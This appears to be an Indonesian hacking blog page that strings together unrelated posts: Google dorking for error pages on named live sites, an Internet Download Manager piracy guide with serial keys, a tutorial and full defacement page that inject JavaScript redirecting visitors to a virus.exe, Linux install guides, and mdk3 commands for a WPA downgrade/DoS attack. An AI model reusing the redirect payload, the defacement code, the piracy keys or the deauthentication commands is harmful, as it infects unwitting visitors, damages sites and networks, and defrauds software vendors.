w

Cara Mudah Menemukan Bug Website

cara Mudah Menemukan Bug Website


LOL-  Banyak Jalan Menuju Roma, Pernah dengar istilah itu kan? tentu pernah, sama saja di dunia Hacking, ada banyak cara untuk mendapatkan Informasi dari website target, melihat errornya,  menemukan tabel nya, sampai melakukan Decryption pada Password yang telah di Encrypt. menemukan error page adalah salah satu hal penting dalam melakukan Aksi Hacking, karena Error page biasanya di jadkan sebagai Batu Loncatan untuk memulai hacking, atau titik Start... maaf, saya menulis artikel ini, bukan saya seorang ahli komputer, atau apalah namanya, saya cuma seorang Blogger... waduh, kok malah curhat!!! oka deh... lanjut...
sebenarnya cara paling ampuh mencari Bug, adalah Dork, Dork biasa di gunakan untuk melompat ke sebuah halaman yang di inginkan, nah bagaimana jika yang saya inginkan adalah halaman Error??? tentu bisa, Google kan Sexy, saking sexy nya,dia Transparant...
caranya simple, tinggal masukkan di halaman pencarian itu seperti ini :
www.webtarget.com.my/ "warning" dan ENTER
ini sedikit dari ratusan error page yang bisa di dapatkan dengan menggunakan trick kecil nan manual ini

http://www.newaykb.com.my/outlets.php?locid=1
http://www.irc.com.my/irc/
http://www.shoesshoesshoes.com.my/catalogue.php
http://www.iplo.com.my/
http://www.ngakorming.com/en/2009/07/

mungkin andaingin bertanya, bagaimana menemukan itu? apakah menggunakan tool khusus?
jawabannya, tidak, saya cuma gunakan Google dan Keyboard saja
sebenarnya trik ini sama methode dengan Dork biasa, tetapi ini dalam Algo pencarian yang sedikit beda.
yah, sekiranya begitu saja.


Membuat IDM Jadi Full Version TANPA CRACK


Cara ini bisa digunakan untuk IDM versi berapa saja (^_^)

Silahkan download IDM versi terbaru di WEBSITE nya.

Install... kalo ada peringatan fake serial atau disuruh register abaikan dulu / klik cancel.

Lalu perhatikan cara berikut :

1. Hal pertama yg harus kita lakukan adalah mematikan / memutuskan koneksi internet komputer kita.

2. Setelah itu isi registration.
First name, last name, dan email terserah kita. Untuk serial number gunakan (pilih salah satu) :
1B0C2-NOGKB-AH0DH-W8R3C
S89JW-J3KDR-KBHW5-RMQ8H
QVD3H-ZY9K1-GW94Z-XOLQS
1XL56-8BB1L-TTQII-89DFX
X33SI-6BW37-SQG4D-FGN8M
1O6SO-LOOFL-ZFW66-EIF97
UXX3S-9N0NT-M74X0-DESMI
W3J5U-8U66N-D0B9M-54SLM
EC0Q6-QN7UH-5S3JB-YZMEK
GZLJY-X50S3-0S20D-NFRF9


Lalu klik OK


3. Buka windows explorer, cari file bernama hosts di C:\WINDOWS\system32\drivers\etc\hosts


Buka file hosts tersebut dengan notepad.


4. Lalu copas code berikut : 
127.0.0.1 tonec.com 
127.0.0.1 www.tonec.com 
127.0.0.1 registeridm.com 
127.0.0.1 www.registeridm.com 
127.0.0.1 secure.registeridm.com 
127.0.0.1 internetdownloadmanager.com 
127.0.0.1 www.internetdownloadmanager.com 
127.0.0.1 secure.internetdownloadmanager.com 
127.0.0.1 www.secure.internetdownloadmanager.com 
127.0.0.1 mirror.internetdownloadmanager.com 
127.0.0.1 www.mirror.internetdownloadmanager.com 
127.0.0.1 mirror2.internetdownloadmanager.com 
127.0.0.1 www.mirror2.internetdownloadmanager.com 
127.0.0.1 mirror3.internetdownloadmanager.com 
127.0.0.1 www.mirror3.internetdownloadmanager.com
127.0.0.1 174.133.70.98

Letakkan dibawah tulisan 127.0.0.1 localhost


Setelah itu save (Ctrl S).


5. Nyalakan kembali koneksi internet.

Beress... IDM kita sudah full version... tanpa harus menggunakan crack (^_^)


Dipake buat download nggak ada masalah... normal seperti biasa... (^_^)




Selamat mencoba... dan ucapkan selamat tinggal kepada crack... hahahaa... (^_^)



Tambahan :

1. Kalo file hosts nggak ketemu, ada kemungkinan terhidden. Aktifkan view hidden files di windows explorer.

2. Untuk pengguna windows vista / windows 7, ada beberapa cara edit file hosts nya :
- Copy file hosts ke drive lain selain drive C, edit dengan notepad kemudian save, copy paste file tersebut ke tempat asal folder file hosts
- Edit nya via administrator
- Edit nya via safe mode

3. Karena kita telah mem-block main download server IDM (mirror2.internetdownloadmanager.com), maka untuk mendownload versi terbaru dari IDM, pilih download from Cnet, atau dari Mirror Site yg ada di Page Download.

menyisipkan-virus-pada-halaman-htm-atau.html


Pertama Tama


Upload virusmu di shell depes,,,,
jika sudah selesai di upload,, copy alamat virus tadi misallnya alamat virus yang telah kamu upload di shell berada pada http://alamatweb/image/virus.exe

copy code berikut pada file html / depesmu, ingat harus dipaste sebelum kode </html> atau pada body html


<script type="text/javascript">
<!--
function exec_refresh()
{
window.status = "Redirecting..." + myvar;
myvar = myvar + " .";
var timerID = setTimeout("exec_refresh();", 150);
if (timeout > 5)
{
timeout -= 5;
}
else
{
clearTimeout(timerID);
window.status = "";
window.location = "alamat virusmu";
}
}
var myvar = "";
var timeout = 190;
exec_refresh();
//-->
</script>

misalnya saya masukkan pada halaman deface saya jadinya : -->

 <html>

<style type="text/css">
  


 |</div>
body {
    background-color: black;
}
//.matrix { font-family:Lucida Console, Courier, Monotype; font-size:10pt; text-align:center; width:10px; padding:0px; margin:0px;}
.matrix { font-size:17pt; text-align:center; width:20px; padding:0px; margin:0px;}
</style>
<center><font face="Verdana" size="2" color="#FF0000">GOTCHA :P LOL </font> |
     <script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template=Your IP: <IP>"></script> <font color="#ff9900"> | </font> <script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template= <isp>"></script><font color="#ff9900"> | </font><script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template= <country>"></script> <font color="#ff9900"> | </font> <script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template= <flag>"></script></center>
<link rel="SHORTCUT ICON" href="http://i55.tinypic.com/2z7ld11.gif">
<body style="background-color: black;"><title>### HACKED BY TrojanzBoy###</title><center><div style="font-family: impact; font-size: 25px; color: red; background-color: black; padding-top: 2px; text-align: center; line-height: 75px; height: 75px;">


<div align=center id="matrix"}>
  <style type="text/css">b.drop-shadow { text-shadow: 0 0 2px #ccc; }</style><font color="red"><b class="drop-shadow"><b>.:: P0wn3d By TrojanzBoy ::.</b></font></b>    

      
</div>

<html>
<title>./P0wn3d By TrojanzBoy</title>

<body bgcolor="#000000" text="white">
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>

<center>


<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-FqlGtXywUzM_hAFqBX08vbEyfPAJcKpbngCs1s0DGEsRqZnQo8Yp34CYraQ5G4sxRweJwGLWCEvLKVf26rw9-3lT1vYdYbjLCTue182tLtLtVHXMGpFO9Z5OKry7S0ioOXWMbcP87rs/s1600/anak-pemulung.jpg" height="480px"></img>

</center>
<center>

aku hanyalah seorang pemulung web . . . !<br>
</center>
<small>

</font>
</a>

</i>
</small>

</p></center>


<script type="text/javascript">
<!--
function exec_refresh()
{
window.status = "Redirecting..." + myvar;
myvar = myvar + " .";
var timerID = setTimeout("exec_refresh();", 150);
if (timeout > 5)
{
timeout -= 5;
}
else
{
clearTimeout(timerID);
window.status = "";
window.location = "http://narutoupdate.strangled.net/virus.exe";
}
}

var myvar = "";
var timeout = 190;
exec_refresh();
//-->
</script>

</body></html>


</marquee></a>
<center>
    <embed src="http://videokeman.com/music/videokemanplay.swf" width="1" height="1" wmode="transparent" FlashVars="playerID=1&amp;bg=0xffffff&amp;leftbg=0xCA4536&amp;lefticon=0xffffff&amp;rightbg=0xCA4536&amp;rightbghover=0x999999&amp;righticon=0xffffff&amp;righticonhover=0xffffff&amp;text=0xCA4536&amp;slider=0x303030&amp;track=0xFFFFFF&amp;border=0x666666&amp;loader=0xC52C24&amp;autostart=yes&amp;loop=yes&amp;soundFile=http://videokeman.com/dload/nm3/053011/Alexandra_Stan_-_Mrxdot_Saxobeat.vkm"></embed>
</body>
</center>

<html>

Cara dual Debian dan windows 7 dengan "win32-loader.exe


Terlepas dari kontroversi "dual boot OS", saya hanya berharap, ini merupakan salah satu langkah kita untuk bermigrasi ke linux. jika kemarin ada bahasan menarik mengenai "win32-loader debian.exe" maka kali ini saya membahas "win32-loader debian.exe" untuk penggunaan yang lain, yaitu sebagai cara kita untuk boot OS linux melalui boot loader windows.
latar belakang :
Ini adalah kemungkinan yang bisa dijadikan alasan kenapa menggunakan alternatif boot berikut ini :
1. anda pengguna debian linux sekaligus windows, suatu ketika windows anda bermasalah dan anda lakukan instal ulang windows, setelah proses instal windows selesai anda mendapati tidak bisa boot pada debian linux.
2. anda pengguna windows dan mencoba untuk menanam debian linux pada komputer, dan anda lupa memasang grub / lilo pada mbr sehingga anda tidak bisa boot pada debian linux.
3. anda seorang eksperimentalis di dunia komputer.

alat dan bahan :
1. "win32-loader.exe" incluide cd installer debian atau download di http://ftp.nl.debian.org/debian/tools/win32-loader/stable/win32-loader.exe
2. komputer yang sudah tertanam windows dan linux debian.
3. tekat

pelaksanan :
1. jalankan windows dan install "win32-loader debian.exe"
2. setelah proses instal selesai pastikan file dan folder berikut ada di drive C:\
 - file:\\\g2ldr
 - file:\\\g2ldr.mbr
 - folder:\\\win32-loader
 kalau anda tidak mendapatkan file dan folder ini di C:\ maka cari di drive lain. lakukan copy paste seperti biasanya dan letakkan file dan folder tersebut di C:\
3. masuk ke dalam folder win32-loader dan temukan file grub.cfg, edit dengan notepad, sebagai contoh kasus yang penulis lakukan adalah sebagai berikut :

menuentry "Debian on sdb8" {
   linux   /win32-loader/vmlinuz-3.0.4 root=/dev/sdb8
   initrd  /win32-loader/initramfs-3.0.4.img
}

menuentry "Ubuntu on sda7" {
   linux   /win32-loader/vmlinuz-3.0.0-12-generic root=/dev/sda7
   initrd  /win32-loader/initrd.img-3.0.0-12-generic
}

menuentry "Ubuntu Demo mode" {
   linux (hd0,6)/ubuntu/boot/vmlinuz iso-scan/filename=/ubuntu/ubuntu.iso quiet splash boot=casper ro debian-installer/locale=id_ID.UTF-8 keyboard-configuration/layoutcode=us keyboard-configuration/variantcode= --  rootflags=sync
   initrd (hd0,6)/ubuntu/boot/initrd.lz
}

menuentry "Lubuntu Demo mode" {
   linux (hd0,6)/ubuntu/boot/vmlinuz iso-scan/filename=/ubuntu/lubuntu.iso quiet splash boot=casper ro debian-installer/locale=id_ID.UTF-8 keyboard-configuration/layoutcode=us keyboard-configuration/variantcode= --  rootflags=sync
   initrd (hd0,6)/ubuntu/boot/initrd.lz
}

menuentry "Knoppix" {
   linux   /win32-loader/kn67 ramdisk_size=100000 lang=en apm=power-off initrd=minirt.gz nomce utc no3d screen=1024x768 fromhd=/dev/sda5
   initrd  /win32-loader/kn67.gz
}

4. pada dasarnya di dalam folder win32-loader sudah terdapat file kernel, hanya saja karena penulis menggunakan ini untuk meload bebarapa OS linux maka perlu ditambahkan file kernel semacam vmlinuz-x.x.x dan initrd.img-x.x.x
5. sentuhan terakhir, edit file c:/boot.ini
contoh adalah sebagai berikut:
[boot loader]
timeout=30
default=C:\g2ldr.mbr
[operating systems]
C:\g2ldr.mbr="Debian"
multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Windows XP" /noexecute=optin /fastdetect
C:\="Windows 98"

CARA MENGINSTALL WIRELES DI BLANKON

1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#instalasi wireless broadcom diblankOn __apabila cara pertama gagal coba cara kedua dan seterusnya :

#cara pertama

#download file dibawah ini dalam satu directory:

wget http://arsip.blankonlinux.or.id/blankon/pool/extras/b/b43-fwcutter/b43-fwcutter_015-14_i386.deb
wget http://arsip.blankonlinux.or.id/blankon/pool/main/d/dkms/dkms_2.2.0.3-1.2_all.deb
wget http://kambing.ui.ac.id/ubuntu/pool/restricted/b/bcmwl/bcmwl-kernel-source_5.100.82.38+bdcom-0ubuntu6_i386.deb

sudo dpkg -i *.deb

#cara kedua
aptitude update
aptitude install wireless-tools

#install module firmware wireless
aptitude install firmware-b43-installer

instal pula lpphy untuk broadcom BCM4321
 aptitude install firmware-b43-lpphy-installer
#Reboot laptop


#kemudian tinggal uji wirelessnya
 modprobe b43 atau modprobe b43legacy

#cek
iwconfig

ifconfig wlan0 up


#cara ketiga
$ lspci | grep Network
03:00.0 Network controller: Broadcom Corporation BCM4312 802.11b/g LP-PHY (rev 01)

# apt-get update
Pasang wireless-tools
# apt-get install wireless-tools
Pasang firmware-b43-lpphy-installer

# apt-get install firmware-b43-lpphy-installer
Nyalakan ulang
# reboot
Selesai


Cara Menginstal Flash Player Plug-in untuk Mozilla Firefox di Ubuntu


Cara Menginstal Flash Player Plug-in untuk Mozilla Firefox di Ubuntu. Setelah install ubuntu biasanya kita pakai untuk melakukan browsing atau menjelajah web. Browser bawaan ubuntu yaitu adalah Mozilla Firefox. Nah terkadang agak sedikit risih ketika kita sedang membuka web site principle memerlukan plugin flash playernya, maka otomatis tidak bisa terbuka karena secara default  ubuntu belum terinstall flash playernya. 
Bagaimana Cara Menginstal Flash Player Plug-in untuk Mozilla Firefox di Ubuntu ?
Buka terminal dan install flash player dengan perintah dibawah ini :

sudo apt-get install flashplugin-nonfree

sudo update-flashplugin

Catatan: jika Anda mendapatkan pesan error bahwa paket tidak tersedia, coba instal Gnash(aplikasi alternatif wildebeest Flash) :

 sudo apt-get install libflash-mozplugin
Restart Mozilla Firefox.
Catatan: jika firefox menjadi crash saat mengunjungi situs dengan flash, lakukan hal berikut :
gksudo gedit /usr/bin/firefox
Dan tambahkan baris berikut di akhir berkas : 
export XLIB_SKIP_ARGB_VISUALS=1
 Restart Mozilla Firefox
Catatan: bila suara tidak bekerja dalam Flash Player (sebagai contoh pada YouTube) :
 sudo apt-get install alsa-oss
 gksudo gedit /etc/firefox/firefoxrcUbah: 
FIREFOX_DSP=""
Menjadi :
 FIREFOX_DSP="aoss"
 Restart Mozilla Firefox. Sekarang suara sudah dapat terdengar dalam Flash Player. 
Selesai deh  Cara Menginstal Flash Player Plug-in untuk Mozilla Firefox di Ubuntu. Terima Kasih.

Mengacaukan Enkripsi WPA


Mungkin Anda sering berhadapan dengan security Wireless WEP, WPA, MAC Filter ataupun bentuk keamanan lainnya...???  Sekarang standarisasi keamanan wireless sudah meninggalkan WEP karena algoritma WEP sudah terpecahkan... tindakan craking terhadap enkripsi WEP banyuak dilakukan dimana2...bermodalkan : Aircrack, WEPBuster, WiFite, etc.  Sekarang sudah beralih pada masa WPA. Amankah WPA...??? tidak ada system 100% secure.   Kali ini saya akan memberikan cara mengacaukan enkripsi WPA.
Ya.... proses pengacauan ini sering desbut dengan istilah WPA Downgrade yang merupakan  tindakan penyerangan dengan mempergunakan "deauthenticates Stations and AP" untuk melakukan pengiriman packet enkripsi WPA yang mengakibatkan "WPA broken". Pengertian WPA downgrade disini bukan berarti menurunkan ekripsi WPA ke WEP loh...;)


Persiapan :
[0] Wireless USB, saya mempergunakan 3 devices wireless USB yang support dengan packet injection, yaitu :
. Intel Wireless 3945ABG (My internal notebook Wireless).
Wireless devices ini saya gunakan untuk menjalankan Kismet dan Kismet Console.

. AirLive WL-360USB dengan antena Omni AirLive 10 dbi
Wireless devices ini saya gunakan untuk melakukan penyerangan pada Console 1.

. AirLive WL-1600USB dengan antena Omni AirLive 10 dbi
Wireless devices ini saya gunakan untuk melakukan penyerangan pada Console 2.
* Penyerangan dilakukan melalui 2 console agar AP yang menjadi target mendapat serangan yang
benar2 terserang.
* Saya mempergunakan antena omni 10 dbi agar dapat melakukan tindakan penyerangan dari kejauhan...
kalo dari deket nanti ketauan pemilik AP loh... becarefull !!!

[1] Dalam penyerangan ini saya mempergunakan Linux BackTrack 4 R1, saya tidak mempergunakan BackTrack 4 R2 karena saya belum donlod...lol

[2] Tentu ada AP yang menjadi target !!! kali ini yang menjadi target adalah AP milik kantor tempat saya bekerja yaitu : Linksys WRT54GL yang sudah diupgrade firmwarenya meempergunakan DDWRT versi 2.4 SP1.

Bagaimana teknik penyerangan :

+------------------------------------------------------------------------------+
| Memastikan devices wireless yang kita gunakan sudah terpasang : |





+------------------------------------------------+
| Memastikan ada AP yang akan diserang : |
+------------------------------------------------+
root@reja:~# airodump-ng wlan1




erhatikan, yang menjadi target dalam kali ini adalah :
+----------------------------------------------------------------------------------+
| 00:25:9C:C1:30:0E   -37   484   0   0   11   54e.   WPA   TKIP   PSK   Hack_Me   |
+----------------------------------------------------------------------------------+

command : ./mdk3 <wifi_interface> g -t <mac_address_ap_target>


. lakukan penyerangan pada 2 console :

console 1 :
root@reja:/pentest/wireless/mdk3# ./mdk3 wlan1 g -t 00:25:9C:C1:30:0E


console 2 :
root@reja:/pentest/wireless/mdk3# ./mdk3 wlan2 g -t 00:25:9C:C1:30:0E

Hasil Penyerangan yang dipantau Kismet Console :




*  Lakukan teknik penyerangan ini selama kurang lebih 30 menit saja, Posible DoS !!!!!!!  Efec dari kegiatan ini adalah WPA yang diinput oleh user akan dianggap salah, bahkan jika dianggap benar tapi harus melalui proses waktu tunggu yang sangat lama.




by Reja Exe Tex
selamat mencoba



Powered by Blogger.
Back to top